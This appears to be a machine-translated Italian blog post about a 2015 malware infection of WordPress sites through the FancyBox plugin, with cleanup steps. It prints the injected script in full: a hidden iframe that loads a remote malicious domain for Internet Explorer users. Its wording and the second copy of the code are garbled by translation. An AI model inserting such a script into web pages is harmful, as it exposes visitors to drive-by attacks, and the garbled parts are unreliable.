All'inizio della settimana, una serie di siti e blog con WordPress, ha ricevuto avvisi di infezione da malware Attraverso Google Webmaster.

Il problema a cui Google Webmaster si riferisce alla presenza di a merluzzo / sceneggiatura malware iFrame nelle pagine web di origine.

<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>

Sembra che si tratti di a vulnerabilità UN collegareacquisFancyBox per WordPress che fino a ieri (02.05.2015) non veniva aggiornato da molto tempo.
Risolvere questo problema e disinfezione dei siti virali con questo malware è relativamente semplice.
1. Disabilita il plugin FancyBox.
2. Elimina tutti i file dei plugin FancyBox dal server (tramite FTP)
3. Installa la nuova versione del plugin (FancyBox 3.0.4)

FancyBox per WordPress 3.0.4

– Rinominata l'impostazione interessata dal problema di sicurezza menzionato in 3.0.3. Ciò dovrebbe impedire la visualizzazione del codice dannoso sui siti in cui il plug-in viene aggiornato senza rimuovere il codice dannoso.

FancyBox per WordPress 3.0.3

– Risolto un problema di sicurezza.

Informazioni sul malware:

TIPO: reindirizzamento iframe
DESTINAZIONE: WordPress Fancybox
DOMINIO MALWARE: 203koko.eu
URI DEL MALWARE: http://203koko.eu/hjnfh/ipframe2.php
CODICE RAW DEL MALWARE: <iframe src=”http://203koko.eu/hjnfh/ipframe2.php” larghezza=”20″ altezza=”30″ ></iframe>
SCRIPT DEL MALWARE: <sceneggiatura>if (navigator.userAgent.match(/msie/i)) { document.write(‘ <stile div=”posizione:assoluta;sinistra:-2000px;larghezza:2000px”>

Rimuovi malware dal tuo sito Web WordPress.